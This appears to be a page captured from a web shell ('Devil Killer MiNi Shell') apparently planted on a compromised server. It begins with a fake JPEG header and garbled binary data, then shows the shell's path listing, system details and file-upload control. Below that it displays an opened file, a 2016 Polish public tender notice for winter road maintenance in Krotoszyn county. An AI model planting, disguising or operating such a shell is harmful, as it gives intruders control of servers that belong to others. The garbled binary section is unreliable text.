JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161017/324663-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='' target='_blank'></a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 324663 - 2016
              z dnia 2016-10-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Krotoszyn: Zimowe utrzymanie dróg na terenie powiatu krotoszyńskiego w sezonie zimowym 2016/2017
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Zarząd Dróg, krajowy numer identyfikacyjny
              25086482400000, ul.
              ul. Transportowa 
              1,
              63700  
              Krotoszyn, woj.
              wielkopolskie, państwo
              Polska, tel.
              627 226 531, e-mail
              , faks
              627 226 531.
              <br />
              Adres strony internetowej (URL): ww.pzdkrotoszyn.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.pzdkrotoszyn.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Starostwo Powiatowe w Krotoszynie ulica 56 Pułku Piechoty Wlkp 10, 63-700 Krotoszyn , pokój nr 25</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg na terenie powiatu krotoszyńskiego w sezonie zimowym 2016/2017
<br /><b>Numer referencyjny: </b>PZD-63/109/2016 ; l.dz.4351/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem postępowania przetargowego  o udzielenie zamówienia publicznego jest podpisanie umowy (udzielenie zamówienia) z Wykonawcą, którego oferta uznana zostanie za najkorzystniejszą, i który będzie świadczyć na rzecz Zamawiającego usługi polegające na realizacji zadania pod nazwą: Zimowe utrzymanie dróg na terenie powiatu krotoszyńskiego w sezonie zimowym 2016/2017 z podziałem na 8 zadań według podziału określonego w punkcie 3.4 SIWZ.Zimowe utrzymanie dróg polegać będzie na odśnieżaniu dróg poprzez mechaniczne usuwanie śniegu 
z jezdni i poboczy. W przypadku wystąpienia dużych zasp śnieżnych w pasie jezdni gdzie pługi odśnieżne nie będą w stanie odśnieżyć, przemieszczenie  zasp poza pas jezdny nastąpi  przy pomocy ładowarek.W każdym zadaniu obejmującym zimowe utrzymanie dróg powiatowych, będących przedmiotem niniejszego postępowania przetargowego Wykonawca musi zapewnić odśnieżanie zatok oraz przystanków autobusowych. Przedmiot zamówienia został podzielony na 8 zadań i obejmuje: ZADANIE NR 1:zimowe utrzymanie dróg na terenie Miasta i Gminy Koźmin Wlkp. na następujących odcinkach ulic i dróg powiatowych:MIASTO KOŹMIN WLKP ( ulice):I kolejność standard 3:
Cieszyńskiego; Dworcowa; Floriańska; Grębowska; Jana Pawła II; Kobylińska; Marcińca; Pleszewska; Podgórna; Poznańska: Prosta; Staniewska; Strzelecka; Targowa; Zamkowa; Zielony Rynek.DROGI POZA MIEJSKIE KOŹMIN WLKP ;I kolejność standard 3:Droga powiatowa nr 5145 P :Koźmin Wlkp Dobrzyca do granicy powiatu,I kolejność standard 4:Droga powiatowa nr 5152 P -Koźmin Wlkp  Rozdrażew  do bazy SKR w Rozdrażewie, Droga powiatowa nr 4908 P Borzęciczki-Kacza Górka ,Droga powiatowa nr 4918 P  Kacza Górka granica powiatu krotoszyńskiego- Mokronos-Gościejew-Wielowieś ( skrzyżowanie z drogą nr 5136 na Wyganów),II kolejność- standard 5:Droga Powiatowa nr 5133 P Koźmin Wlkp  Staniew-Mokronos-Józefów ( granica powiatu krotoszyńskiego),Droga powiatowa nr 4169 P Rusko-granica powiatu krotoszyńskiego- Wyrębin- Borzęciczki-Serafinów do drogi 4918P, Droga powiatowa nr 4171 P Koźmin Wlkp Nowa Obra-Stara Obra Golina (gr, powiatu Krotoszyńskiego),Droga powiatowa nr 5143 P Stara Obra Wałków-Borzęcice gr. powiatu pleszewskiego (Galew) ,Droga powiatowa nr 5146 P Borzęcice-Sapieżyn do drogi krajowej nr 15,Droga powiatowa nr 5149 PCegielnia-Wyki- gr powiatu pleszewskiego do skrzyżowania z drogą gminną na Wyki,
Droga powiatowa nr 5139 P Psie Pole-Kaniew-Dębiogóra-Czarny Sad do drogi krajowej nr 15 ,Droga powiatowa nr 5137P Mokronos-Skałów-Psie Pole-Koźmin Wlkp. ,Droga powiatowa nr 4919P Mokronos-Małgów, Droga powiatowa nr 4916 P Międzyborze gr. powiatu krotoszyńskiego- Pogorzałki Małe-Mycielin-Borzęciczki, Droga powiatowa nr 5148P Koźmin Wlkp Tatary-Grębów do skrzyżowania z drogą Trzemeszno-Cegielnia,Droga powiatowa nr 5138P Gościejew-Skałów, Droga powiatowa nr 5140 P Kaniew-Wronów-Benice  ( do Wronowa)- skrzyżowanie z drogą gminną, ZADANIE NR 2 :zimowe utrzymanie dróg na terenie Gminy Rozdrażew na następujących odcinkach ulic i dróg powiatowych:GMINA ROZDRAŻEW :I kolejność standard 3-Droga powiatowa nr 4331P (Nowy Świat)-granica powiatu krotoszyńskiego- Nowa Wieś-Rozdrażew do miejscowości Brzoza( skrzyżowanie z drogą gminną Brzoza-Kobierno),II kolejność standard 4-Droga powiatowa nr 5152 P Rozdrażew- Koźmin ( od ul. Krotoszyńskiej do bazy SKR w Rozdrażewie),II kolejność standard 5:Droga powiatowa nr 5151P Rozdrażew-Trzemeszno-Grębów, Droga powiatowa nr 5149 P Wyki od skrzyżowania z drogą gminną- gr. powiatu pleszewskiego (Koźminiec),
Droga powiatowa nr 5155P Rozdrażew-Rozdrażewek Różopole do skrzyżowania z drogą nr 5158 P,Droga powiatowa nr 5153 P Nowa Wieś Maciejew-Rozdrażewek,
Droga powiatowa nr 5154P Rozdrażew-Rozdrażewek, Droga powiatowa nr 5156 P Rozdrażew- Dąbrowa- Kobierno ( skrzyżowanie z drogą 5158P),Droga powiatowa nr 5168P droga krajowa nr 15 Dzielice, Droga powiatowa nr 5148 P Grębów od skrzyżowania z drogą Trzemeszno-Cegielnia-Nowa Wieś-Koźminiec,ZADANIE NR 3:zimowe utrzymanie dróg na terenie Miasta Krotoszyna na następujących odcinkach ulic i dróg powiatowych:MIASTO KROTOSZYN (ulice):I kolejność standard 3-Zdunowska od ul. Piastowskiej do ul. Kołłątaja; Szosa Benicka; Ogrodowskiego; Floriańska; Grudzielskiego; Klemczaka Konstytucja 3 Maja; Kobylińska; Kościuszki; Koźmińska ;Piastowska; Kozala od drogi krajowej nr 15 do miejscowości Brzoza( skrzyżowanie z drogą gminną Brzoza-Kobierno); 56 Pułku Piechoty Wlkp. Raszkowska; Spartańska; Stawna; 23 stycznia; Rawicka; Słowiańska ; Transportowa ; Wiśniowa; Benicka,II kolejność standard 3:Św. Antoniego ; Ceglarska; Chwaliszewska; Domki Farne; Dworcowa; Pukackiego; Fabryczna; Głowackiego; Kamienna; Kilińskiego; Klonowicza; Kobierska; Kopieczki; Kopernika; Langiewicza; Magazynowa; Masłowskiego; Młyńska ;Ofiar Katynia; Osadnicza; Plac Szkolny; Polna; Półwiejska; Przemysłowa; Robotnicza; Słodowa; Sosnowa; Spokojna; Staszica; 1 stycznia; Ściegiennego; Świętokrzyska; Wiejska; Więźniów Politycznych; Zacisze; Zamkowy Folwark,ZADANIE NR 4:zimowe utrzymanie dróg na terenie Gminy  Krotoszyna -wschód na następujących odcinkach ulic i dróg powiatowych,DROGI POZA MIEJSKIE KROTOSZYN :I kolejność standard 4-
Droga powiatowa nr 5158 P Krotoszyn (Raszkowska) Kobierno-Różopole-Roszki- gr. powiatu ostrowskiego,Droga powiatowa nr 5166P Krotoszyn (Bolewskiego) Chachalnia  skrzyżowania z drogą 5165P  -do drogi wojewódzkiej nr 444 Krotoszyn- Sulmierzyce,II kolejność standard 5:
Droga powiatowa nr 4332P Roszki-Orpiszew-gr. powiatu ostrowskiego  Janków Zaleśny,Droga powiatowa nr 5165 P gr. powiatu Ostrowskiego Chwaliszew Chachalnia do drogi wojewódzkiej nr 444 Krotoszyn  Sulmierzyce, 
Droga powiatowa nr 5161 P Ugrzele-Baszyny-gr, powiatu ostrowskiego (Janków Zaleśny),Droga powiatowa nr 5159 P Krotoszyn(Spartańska)- Tomnice-Jasne Pole-Orpiszew-Baszyny, Droga powiatowa nr 5155P Biadki- Duszna Górka (skrzyżowanie z drogą nr 5162P) ,Droga powiatowa nr 5162 P Krotoszyn (Stawna, Gorzupska-Gorzupia-Świnków- gr. powiatu ostrowskiego Janków Zaleśny,Droga powiatowa nr 5163 P Orpiszew-Świnków-Biadki do drogi krajowej nr 36,Droga powiatowa nr 5157 P Kobierno-Tomnice-Gorzupia Smoszew do drogi krajowej nr 36, Droga powiatowa nr 5164P Biadki- Chwaliszew do skrzyżowania z drogą 5165P, ZADANIE NR 5:zimowe utrzymanie dróg na terenie Gminy  Krotoszyna - zachód na następujących odcinkach ulic i dróg powiatowych,I kolejność standard 4:Droga powiatowa nr 4918P Wielowieś od skrzyżowania z drogą nr 5136P Benice-Wróżewy-Krotoszyn (Szosa Benicka),II kolejność standard 5:Droga powiatowa nr 5140 P Wronów od skrzyżowania z drogą gminną- Benice,Droga powiatowa nr 5141 P Benice-Ustków,Droga powiatowa nr 5136 P Wielowieś Wyganów ,Droga powiatowa nr 5142P  do drogi krajowej nr 15 Bożacin-Wróżewy- Lutogniew, Droga powiatowa nr 5242 P od drogi krajowej nr 36 Lutogniew-Dzierżanów- Rojew do skrzyżowania z drogą 4097 P ,ZADANIE NR 6:zimowe utrzymanie dróg na terenie Miasta Sulmierzyce na następujących odcinkach ulic i dróg powiatowych,MIASTO SULMIERZYCE -I kolejność standard 3:Poznańska do m. Chwaliszew do skrzyżowania z drogą 5165P; Powstańców Wlkp.; Uciechowska; Wrocławska; Kaliska,ZADANIE NR 7:zimowe utrzymanie dróg na terenie Gminy i Miasta Zduny  na następujących odcinkach ulic i dróg powiatowych:MIASTO ZDUNY-(ulice ),I kolejność standard 3:-Kobylińska; Pl. Kościuszki ; Mickiewicza;  1 Maja ; Ostrowska ; Rynek; Plac Ks. Skargi,II kolejność standard 4-Sulmierzycka,DROGI POZA MIEJSKIE ZDUNY :I kolejność standard 3-
Droga powiatowa nr 5129P od drogi krajowej nr 15 Zduny ul. Kobylińska-Baszków do kościoła- skrzyżowanie z drogą 5500P,II kolejność standard 4
Droga powiatowa nr 5500 P Krotoszyn-Konarzew-Baszków, II kolejność- standard 5:Droga powiatowa nr 5165 P Zduny-Rynek, Mickiewicza, Pl. Skargi, Ostrowska- Chachalnia Ujazd,Droga powiatowa nr 5144 P Baszków-Bestwin-Ruda gr województwa dolnośląskiego ,Droga powiatowa nr 5167P  Zduny ( ul. Sulmierzycka) granica woj. dolnośląskiego Ujazd , 
Droga powiatowa nr 5500P Baszków-gr. powiatu Jutrosin do ostatnich zabudowań,ZADANIE NR 8:zimowe utrzymanie dróg na terenie  Miasta i Gminy  Kobylin na następujących odcinkach ulic i dróg powiatowych:MIASTO KOBYLIN ( ulice) -I kolejność standard 3.Al. Powstańców Wlkp; Baszkowska; Dworcowa ;Grunwaldzka; Krobska; Kolejowa; Kopernika; Rzemiechowska; Strzelecka,
DROGI POZA MIEJSKIE KOBYLIN -I Kolejność  standard 3:Droga powiatowa nr 5129 P  Kobylin (Baszkowska ) Baszków  do kościoła do skrzyżowania z drogą nr 5500P,II kolejność standard 4:Droga powiatowa nr 5129 P  Kobylin (Baszkowska ) Baszków  do kościoła do skrzyżowania z drogą nr 5500P,
Droga powiatowa nr 5133 P Kromolice-Targoszyce-Łagiewniki, Droga powiatowa nr 4097 P Rojew-Kuklinów-Kromolice,Droga powiatowa nr 4803P Pępowo- Sroki- Górka-Kobylin,Droga powiatowa nr 4920 P (Ochla) gr. Powiatu Krotoszyńskiego- Łagiewniki-Starkówiec-Kobylin, Droga powiatowa nr 4921 P(Gumienice)-gr .powiatu krotoszyńskiego- Zalesie Wielkie- Zalesie Małe-Górka,Droga powiatowa nr 5132 P Zalesie Wielkie Łagiewniki, 
Droga powiatowa nr 5150P Smolice-Rogożewo,II kolejność standard 5 :Droga powiatowa nr 5130P Kobylin (Berdychowska)-Berdychów wieś,Droga powiatowa nr 5131 Starkówiec-Fijałów-Wyganów do drogi krajowej nr 36 ,Droga powiatowa nr 5134P Zalesie Wielkie- do drogi 4921P,Droga powiatowa nr 5135P od drogi krajowej nr 36 Kuklinów-Starygród-Benice (do kościoła do drogi nr 4918P),Droga powiatowa nr 5242 Kobylin (ul. Rzemiechowska)-Rzemiechów wieś,Droga powiatowa nr 4923 P (Pępowo)- gr. powiatu krotoszyńskiego - Zalesie Małe, Droga powiatowa nr 4925 P (Czeluścin)- gr. powiatu krotoszyńskiego- Rębiechów-Kobylin, Droga powiatowa nr 5125 P (Sroki) gr. powiatu krotoszyńskiego (Czeluścin) Sroki ,Droga powiatowa nr 4926 P (Pasierby) gr, powiatu krotoszyńskiego- Raszewy-Smolice.UWAGA:
Zasady zimowego utrzymania na drogach zarządzanych przez Powiatowy Zarząd Dróg w Krotoszynie przedstawia dodatek nr 1 do specyfikacji istotnych warunków zamówienia.  Podział zadań został uwidoczniony na mapie z lokalizacją dróg poszczególnych zadań stanowiących załącznik nr 11 do SIWZ.
Zamawiający może ograniczyć przedmiot zamówienia zawężając usługę typując odcinki dróg, które należałoby utrzymać i z tego tytułu Wykonawcy nie przysługują żadne roszczenia i odszkodowania.O powyższym fakcie Zamawiający powiadomi Wykonawcę pisemnie.W szczególnych sytuacjach związanych z istniejącymi warunkami atmosferycznymi (brak zjawisk  atmosferycznych), Zamawiający może wstrzymać prowadzenie akcji zimowego utrzymania dróg informując o tym fakcie telefonicznie Wykonawcę. Wykonawcy przez okres wstrzymania akcji zimowego utrzymania dróg nie przysługuje wynagrodzenie.Wznowienie akcji następuje na telefoniczny wniosek Zamawiającego.W przypadku, gdy Wykonawca ze względu na bardzo trudne warunki pogodowe nie jest wstanie prowadzić prac zgodnie ze standardem, powinien zawiadomić Zamawiającego na piśmie. W tym przypadku Zamawiający nie potrąca wykonawcy wysokości wynagrodzenia określonego w umowie. Zgoda Zamawiającego na w/w odstępstwo jest przekazana w formie pisemnej Wykonawcy.Wykonawca zobowiązany jest do zapewnienia stałej gotowości do prowadzenia zimowego utrzymania dróg w sezonie 2016/2017 od dnia podpisania umowy do 15.04.2017r.Z tytułu gotowości do prowadzenia akcji zimowej Wykonawcy nie przysługuje wynagrodzenie.Wykonawca będzie odpowiedzialny za całokształt, w tym przebieg oraz terminowe wykonanie zamówienia w okresie umowy.  Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana, jako staranność profesjonalisty właściwa w działalności objętej przedmiotem zamówienia.Wykonawca ponosi odpowiedzialność za szkody wyrządzone podczas wykonywania przedmiotu zamówienia.Zasady  prowadzenia akcji zimowego utrzymania dróg
Akcję zimowego utrzymania dróg będzie prowadził ze strony Powiatowego Zarządu Dróg dyżurny zimowego utrzymania dróg  z siedziby przy ulicy Transportowej 1 w Krotoszynie .Dyżury prowadzone będą całodobowo w zależności od warunków atmosferycznych. W razie potrzeby dyżurny będzie telefonicznie powiadamiał wykonawcę o potrzebie uruchomienia sprzętu zimowego utrzymania dróg. Każdorazowe uruchomienie sprzętu będzie odnotowane w dzienniku zimowego utrzymania dróg przez dyżurnego.
Wykonawca uruchamia sprzęt  w ciągu 1 godziny od telefonicznego  powiadomienia przez dyżurnego PZD.Wykonawca robót powiadamia odwrotnie dyżurnego zimowego utrzymania dróg o wyjeździe sprzętu.
Wykonawca każdorazowo po zakończeniu usług związanych z zimowym utrzymaniem dróg  powiadomi dyżurnego zimowego utrzymania dróg co zostanie odnotowane w dzienniku pracy sprzętu.Wykonawca zobowiązuje się do podania w formularzu oferty nr telefonu,  osoby odpowiedzialnej do realizacji zadań określonych umową.Wykonawca przekazuje za pośrednictwem osób obsługujących pojazdy/sprzęt dyżurnemu zimowego utrzymania dróg informacji o aktualnym stanie przejezdności oraz zapewnia obsadę całodobową na pracującym sprzęcie.Sprzęt:1. Wymagania dotyczące sprzętu:W niniejszej SIWZ podane zostały minimalne ilości jednostek sprzętowych jednak w interesie Wykonawcy pozostaje zapewnienie takiej ilości sprzętu, który pozwoli mu wykonać usługę w określonym standardzie (np. w przypadku awarii jednostki). Wykonawca zobowiązuje się do natychmiastowej podmiany lub naprawy sprzętu.Zamawiający musi mieć dostępny w minimalnym zakresie zestaw sprzętu niezbędny do zimowego utrzymania dróg określony w punkcie 10 SIWZ dla poszczególnych zadań.Składając ofertę cenową na świadczenie usług zimowego utrzymania dróg w zakresie kilku zadań wymieniony sprzęt należy zapewnić z osobna dla każdego zadania. Przez co należy rozumieć, że nie dopuszcza się wykazania jednego sprzętu, urządzenia do kilku zadań jednocześnie.Pojazd wykonujący na drodze prace związane z zimowym utrzymaniem dróg powinien zgodnie z art. 54 ustawy z dnia 20 czerwca 1997 roku prawo o ruchu drogowym (Dz. U. z dnia 20 czerwca 2005 roku Nr 108 ,poz. 908 ze zmianami), tj. pojazd musi być wyposażony i wysyłać żółty sygnał błyskowy odpowiadający warunkom  określonym w § 38 i § 39 Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 roku (Dz. U. z dnia 26 lutego 2003 roku Nr 32,poz. 262 ze zm.).Natomiast części urządzeń zamontowanych na pojeździe wystające poza obrys pojazdu powinny odpowiadać warunkom określonym w § 9 wyżej wymienionego rozporządzenia.
Uwaga dotyczy tylko ładowarek czołowych dla  7 zadań 
1.) Przemieszczanie śniegu przy użyciu ładowarek czołowych poza pas drogowy dróg poza miejskich w przypadku lokalnie mogących powstawać zasp śnieżnych, których sprzęt odśnieżający w postaci pługów odśnieżnych nie jest w stanie usunąć, Wykonawca na telefoniczne wezwanie Zamawiającego zobowiązany będzie do podstawienia sprzętu w ciągu 2 godzin od telefonicznego powiadomienia. Uwaga:W interesie Wykonawcy pozostaje zdobycie wszelkich niezbędnych informacji koniecznych do przygotowania i złożenia oferty.Zamawiający wyklucza możliwość wysuwania przez Wykonawcę roszczeń pod jego adresem z uwagi na błędne skalkulowanie ceny.
 



<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
